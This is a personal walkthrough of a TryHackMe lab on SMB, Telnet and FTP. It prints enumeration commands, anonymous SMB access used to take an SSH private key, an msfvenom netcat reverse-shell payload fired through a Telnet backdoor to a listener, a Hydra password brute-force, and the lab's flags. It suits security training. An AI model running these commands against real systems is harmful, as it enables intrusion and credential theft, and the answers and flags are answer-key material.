Task 1 Get Connected
This task just explains how to connect to the TryHackMe VPN.
No Answer NeededTask 2 Understanding SMB
What does SMB stand for?
Server Message BlockWhat type of protocol is SMB?
response-requestWhat do clients connect to servers using?
TCP/IPWhat systems does Samba run on?
UnixTask 3 Enumerating SMB
Conduct an nmap scan of your choosing, How many ports are open?
I ran nmap $ip -sV but it didn’t return much of anything.
It says the host may be down but since I knew it was turned on I needed to try something else. It recommened using the -Pn flag to avoid ping blocking.
3What ports is SMB running on?
According to Varonis, ports 139 and 445 are the defaults for SMB.
139/445Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?
When I ran enum4linux $ip I was given way too much information from the tool. To filter it down to just what I was looking for, the workgroup name, I piped the enum4linux output to grep and searched for workgroup.
Running enum4linux $ip | grep workgroup returned the output below.
The first line of output gives us the answer. The name of the workgroup is WORKGROUP.
WORKGROUPWhat comes up as the name of the machine?
I remember when getting the original output of enum4linux I saw some information about the machine.
POLOSMBWhat operating system version is running?
Running the enum4linux tool again this time searching for the keyword ‘version’ returned the output below.
This told me the machine was running on OS version 6.1.
6.1What share sticks out as something we might want to investigate?
To get the list of shares I ran enum4linux $ip -S. This gave me the below output.
Out of all the names listed here the one that stuck out the most was ‘profiles’. A share with a name like that is more likely to have personal user information that may be useful.
profilesTask 4 Exploiting SMB
What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?
The TryHackMe lesson on this step gives the template for how to connect to an smb share using smbclient. The syntax is smbclient //[IP]/[SHARE] -U [username] -p [port].
smbclient //10.10.10.2/secret -U suit -p 445Great! Now you’ve got a hang of the syntax, let’s have a go at trying to exploit this vulnerability. You have a list of users, the name of the share (smb) and a suspected vulnerability.
No answer neededLets see if our interesting share has been configured to allow anonymous access, I.E it doesn’t require authentication to view the files. We can do this easily by:
- using the username “Anonymous”
- connecting to the share we found during the enumeration stage
- and not supplying a password.
Does the share allow anonymous access? Y/N?
To access the profiles share on the server I used the command smbclient //$ip/profiles -U Anonymous. It then asked for a password. I just hit enter to give no password and it let me in. I was greeted with an smb prompt.
YGreat! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
The first thing I wanted to see was what all was in the current folder. I used the ls command and found a few interesting items. The one that caught my eye immediately was a file called Working From Home Information.txt.
I tried to output the text file to the shell but the smb console seems to not have cat or less capabilities.
Since it was obvious this shell was a little different than others I am familiar with, I had to check the help menu. I ran help and discovered this shell has the more command available.
I then ran more "working From Home Information".txt and discovered the following in the text file.
The output of this file told me a few things.
- The user’s name is apparently John Cactus
- The account was enabled with ssh
- the IT department email is
it@polointernalcoms.uk - The company has a department manager with the first name James.
John CactusWhat service has been configured to allow him to work from home?
sshOkay! Now we know this, what directory on the share should we look in?
Looking back at the contents of the directory, the .ssh directory seemed to be the most useful to getting ssh access.
.sshThis directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
Inside the .ssh directory I found several keys.
The most useful one is the id_rsa because this is the private key for the connection.
id_rsaDownload this file to your local machine, and change the permissions to “600” using “chmod 600 [file]”.
First I used the get command I saw from the previous help menu to download the id_rsa file. I then used exit to leave the smbclient shell.
Next I listed the contents of the working directory to see if the download was successful.
The download was successful. Next, just to keep things clean, I created a new folder within the Documents directory to hold files for these challenges. Once the folders were created and I moved id_rsa to ~/Documents/Network_Services I continued on.
I then used the chmod 600 command to change permissions as instructed by the task.
Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.
I still needed a username to login with, however. To find this I needed to go back to the smb shell. I looked around for a while in various folders with no luck until I decided to check the rsa_id.pub public key file that was in the same directory as the rsa_id key I’m using for the connection. Looking back I realized I probably should have checked here first.
According to this file there is a user with the name cactus on the system. This is supported by the previous evidence of the user named John Cactus.
The last thing to do was to use the key with an ssh connection to get onto the machine. To do this I used the command ssh cactus@$ip -i ~/.ssh/id_rsa. After doing some testing I found it worked after moving the id_rsa key to the directory ~/.ssh in my Kali Linux distro. I also found I had to input the entire key file path to the ssh command to get it to work. There was probably a more elegant way to do this but this was the first way I was able to get it to work.
Once I was in the system all that was left was to find the smb.txt file and display its contents.
What is the smb.txt flag?
THM{smb_is_fun_eh?}Task 5 Understanding Telnet
This task introduced Telnet which was a method of remotely connecting to a computer across a network. It was the precursor to ssh which was replaced because telnet did not provide encryption to the messages being sent using it. Ssh (Secure shell) solved this problem by scrambling the messages it sent and unscrambling them when they got to the other side.
What is Telnet?
application protocolWhat has slowly replaced Telnet?
sshHow would you connect to a Telnet server with the IP 10.10.10.3 on port 23?
telnet 10.10.10.3 23The lack of what, means that all Telnet communication is in plaintext?
encryptionTask 6 Enumerating Telnet
To start things off I ran an nmap scan on the target IP address. The original scan came back with no results so I widened the range of ports and scanned the whole range of 65,535 instead of the common 1,000.
On the second scan I found port 8012 open.
How many ports are open on the target machine?
1What port is this?
8012This port is unassigned, but still lists the protocol it’s using, what protocol is this?
In the image above it doesnt show what service was running on the port but it did mention it was using tcp.
tcpNow re-run the nmap scan, without the -p- tag, how many ports show up as open?
I know from doing the first scan you will get zero open ports if you don’t specify scanning the entire range.
0Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It’s important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.
No answer neededBased on the title returned to us, what do we think this port could be used for?
The scan also returned other information about the port 8012.
It seemed to have information encoded in some way that removed white space. It appears to have the name “Skidy’s Backdoor”.
a backdoorWho could it belong to? Gathering possible usernames is an important step in enumeration.
SkidyAlways keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.
No answer neededTask 7 Exploiting Telnet
Okay, let’s try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.
To connect to the service I had to use the telnet command, feed in the IP address and specify the correct port to prevent telnet from using the default.
I was able to get in without providing a username or password.
No answer neededGreat! It’s an open telnet connection! What welcome message do we receive?
The above image indicates the welcome message upon first connection to the telnet server. This message was probably what I was seeing in the previous task after being decoded.
SKIDY'S BACKDOORLet’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)
The telnet shell didn’t seem to be very responsive and got stuck on me.
NHmm… that’s strange. Let’s check to see if what we’re typing is being executed as a system command.
No answer neededI began a tcpdump listiner as instructed by the task using sudo tcpdump ip proto \\icmp -i tun0.
This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.
Now, use the command “ping [local THM ip] -c 1” through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)
I went back into the telnet session and ran the above command. To get the local THM ip I went to the top of the webpage in TryHackMe.
After running the command, I navigated back to the terminal tab containing the listener. It showed a connection using ICMP had occured.
YGreat! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let’s have some fun!
No answer neededWe’re going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us.
What word does the generated payload start with?
I used the command msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R given from the task to create the payload needed for to exploit the service.
mkfifoNext I needed to create a listener using the same port as the payload. I used the command nc -lvp 4444 in a different terminal tab.
What would the command look like for the listening port we selected in our payload?
nc -lvp 4444Great! Now that’s running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!
No answer neededSuccess! What is the contents of flag.txt?
First I opened a new telnet session. I had to restart the virtual machine because telnet was starting to get unresponsive. After running the payload I checked back on the listener tab.
The listener told me it caught something from the target IP. There wasn’t an obvious sign I had a shell access. No arrows or prompts or anything. But I ran some commands as a test and it responded to me.
In the first directory I found a flag.txt file. Inside the file I found the flag.
THM{y0u_g0t_th3_t3ln3t_fl4g}Task 8 Understanding FTP
FTP is a client-server communication protocol used to transfer files across a network. It uses port 21 by default and has two connection modes, Active and Passive. Active involves the client machine opening the port and the server connects to it. Passive will have the server open the port and the client connects to it.
What communications model does FTP use?
client-serverWhat’s the standard FTP port?
21How many modes of FTP connection are there?
2Task 9 Enumerating FTP
Run an nmap scan of your choice.
Nmap only found one open port, an FTP service version vsftpd running on port 21.
How many ports are open on the target machine?
1What port is ftp running on?
21What variant of FTP is running on it?
vsftpdGreat, now we know what type of FTP server we’re dealing with we can check to see if we are able to login anonymously to the FTP server. We can do this using by typing “ftp [IP]” into the console, and entering “anonymous”, and no password when prompted.
I was able to connect to the FTP server using the command ftp $ip, then feeding in the username anonymous and just hitting enter when it asked for a password.
I used the ls command in the FTP server to list the contents of the current directory. This told me there was a file called PUBLIC_NOTICE.txt
What is the name of the file in the anonymous FTP directory?
PUBLIC_NOTICE.txtWhat do we think a possible username could be?
I used the less command to display the output of the PUBLIC_NOTICE.txt to the shell. This gave me the above information. It mentions the name Mike which could be a username.
mikeGreat! Now we’ve got details about the FTP server and, crucially, a possible username. Let’s see what we can do with that…
No answer neededTask 10 Exploiting FTP
To exploit the server, the task wants me to use the password cracking tool, Hydra, to bruteforce the password.
The task gives a basic overview of the syntax for the tool:
hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp-tSets the number of parallel connections-lsets the username the password belongs to-Psets the path to the wordlist that will be used to guess the password-vVsets very verbose mode which will show each combination attempted[IP]sets the IP address of the targetftptells the tool which protocol to use.
I ran the command sudo hydra -t 4 -l mike -P $default_wordlist -vV $ip ftp and found the username mike used the password password. How original.
What is the password for the user “mike”?
passwordBingo! Now, let’s connect to the FTP server as this user using “ftp [IP]” and entering the credentials when prompted
I connected back to the FTP server but this time using the username and password I found. I was able to connect.
No answer neededWhat is ftp.txt?
After logging in I listed the contents of the directory and found the file ftp.txt. Inside I found the flag text to answer the challenge.
THM{y0u_g0t_th3_ftp_fl4g}